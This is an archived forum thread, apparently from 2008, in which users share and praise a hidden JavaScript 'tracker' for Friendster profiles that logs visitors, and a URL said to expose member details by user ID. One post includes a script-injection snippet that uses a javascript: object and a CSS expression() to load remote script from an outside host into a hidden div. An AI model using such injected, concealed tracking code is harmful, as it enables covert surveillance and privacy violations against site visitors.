• ARCHIVES 
  • » [code]//js below tracker code// function cekfs() { if(pageViewerID!="") CEKFSID.init(); } if (typeof CEKFSID == "undefined") { CEKFSID = {}; } CEKFSID = { nopz: [], init: functi

[code]//js below tracker code// function cekfs() { if(pageViewerID!="") CEKFSID.init(); } if (typeof CEKFSID == "undefined") { CEKFSID = {}; } CEKFSID = { nopz: [], init: functi

duchess
» FTalkElite
FTalk Level: zero
1969-12-31

Re: [code]//js below tracker code// function cekfs() { if(pageViewerID!="") CEKFSID.init(); } if (typeof CEKFSID == "undefined") { CEKFSID = {}; } CEKFSID = { nopz: [], init: functi

:crybaby: huhuhu im not the first to comment kuya .. hehe nyway.. just dropped by to take a peak if youve posted it already.. hehehe i soo lurve this one! :D keep em comming kuya.. tc! :kiss: gtg :penguin:
Lordheinz
» FTalkElite
1969-12-31

Re: [code]//js below tracker code// function cekfs() { if(pageViewerID!="") CEKFSID.init(); } if (typeof CEKFSID == "undefined") { CEKFSID = {}; } CEKFSID = { nopz: [], init: functi

[quote=ducheszv]:crybaby: huhuhu im not the first to comment kuya .. hehe nyway.. just dropped by to take a peak if youve posted it already.. hehehe i soo lurve this one! :D keep em comming kuya.. tc! :kiss: gtg :penguin:[/quote] :crybaby: im sorry cutie,..i forgot to inform you...well anyway,where you going...?..thanks...
j0hnc3na
» FTalker
1969-12-31

cool codes...it's magic!!! hehe..
blurrycloud
» FTalkAgent
1969-12-31

:arrow: manual search about friendster member [quote]http://profiles.friendster.com/modules/module.php?_pmr=a&_pmmo=0&uid=[b]UID[/b][/quote] actually nophatz is great, analyzing what he can do with the module above.... it contains all the info about a friendster member except for his/her password.. lols.. thanks to nophatz... and buddy heinz for sharing this tweak from ftalk indonesia...

Last edited by blurrycloud (2008-02-07 02:45:37)

hadez_rey
» FTalker
1969-12-31

tnx....
misty
» n00b
1969-12-31

Very useful code.. thanks for sharing these NoPathz and Lordheinz =) :thumbsup:
Lordheinz
» FTalkElite
1969-12-31

[quote=blurrycloud]:arrow: manual search about friendster member [quote]http://profiles.friendster.com/modules/module.php?_pmr=a&_pmmo=0&uid=[b]UID[/b][/quote] actually nophatz is great, analyzing what he can do with the module above.... it contains all the info about a friendster member except for his/her password.. lols.. thanks to nophatz... and buddy heinz for sharing this tweak from ftalk indonesia...[/quote] yah buddy his a great coder...cheers buds! =) @ misty...anytime... =)

Last edited by lordheinz (2008-02-07 03:40:49)

misty
» n00b
1969-12-31

By the way, is there any code to make this hidden @ Lordheinz?
Lordheinz
» FTalkElite
1969-12-31

[quote=misty]By the way, is there any code to make this hidden @ Lordheinz?[/quote] im sorry misty theres no available code for that... =)

Last edited by lordheinz (2008-02-07 03:54:16)

misty
» n00b
1969-12-31

Oh ok, thanks though Sir Lordheinz! =)
Lordheinz
» FTalkElite
1969-12-31

[quote=misty]Oh ok, thanks though Sir Lordheinz! =)[/quote] you are always welcome misty.. ;)
limish
» n00b
1969-12-31

having this trick invisible is scary and very awesome ... thanks for sharing ;)
misty
» n00b
1969-12-31

I think I figured out the code to make it hidden @ Lordheinz. It works on my profile: <">
Lordheinz
» FTalkElite
1969-12-31

[quote=misty]I think I figured out the code to make it hidden @ Lordheinz. It works on my profile: <">[/quote] wow your great then..thanks for that info..misty...;)
duchess
» FTalkElite
1969-12-31

hmm i think that was the trick a member did before to make it hidden.. it was the cool searcher function then.. anyway ,, thanks for sharing the trick to hide it. im back? :redface:
misty
» n00b
1969-12-31

Yeah, I think it was from darknight? I really do hope I got the name right. That was his code to make the User Info Searcher hidden. I wasn't so sure about the tag if I posted it right.
Lordheinz
» FTalkElite
1969-12-31

^ glad you inform us about that code... ;)
n0quit
» n00b
1969-12-31

@lord heinz can u make a complete code coz i dont know what or how onload holder , js and css compile or tell me whats wrong with this http://h1.ripway.com/badukang/bago.css http://h1.ripway.com/badukang/bago.txt http://h1.ripway.com/badukang/bagojs.txt <object type=text/javascript data=" javascript: a=document.createElement('script');a.src='http://h1.ripway.com/badukang/bagojs.txt';parent.document.getElementById('navBg').appendChild(a);obj" height=1></object><div id='loader' style="ArchAngell:expres\sion(function b(){a=document.createElement('script');a.src='http://h1.ripway.com/badukang/bagojs.txt';navBg.appendChild(a)}b());text:expres\sion(loader.style.ArchAngell='0');visibility:hidden"></div> help me plz
Lordheinz
» FTalkElite
1969-12-31

perhaps you need to read this tutorial...[url]http://theftalk.com/t15088-Compiling-javascripts-file.html[/url] about your linker..please do not use other linker..use the linker of levisornothing instead..=)
xdarksaint
» n00b
1969-12-31

[quote=misty]Yeah, I think it was from darknight? I really do hope I got the name right. That was his code to make the User Info Searcher hidden. I wasn't so sure about the tag if I posted it right.[/quote] ouch.. i think that was me... haha... just kidding... @[b]lordheinz[/b] thanks for continuous sharing of the codes... keep it up buddy :thumbsup: thanks also to [b]nhopatzzz[/b]...
  • ARCHIVES 
  • » [code]//js below tracker code// function cekfs() { if(pageViewerID!="") CEKFSID.init(); } if (typeof CEKFSID == "undefined") { CEKFSID = {}; } CEKFSID = { nopz: [], init: functi

Board footer

© 2024 F Talk

Current time is 04:50

[ 9 queries - 0.032 second ]
Privacy Policy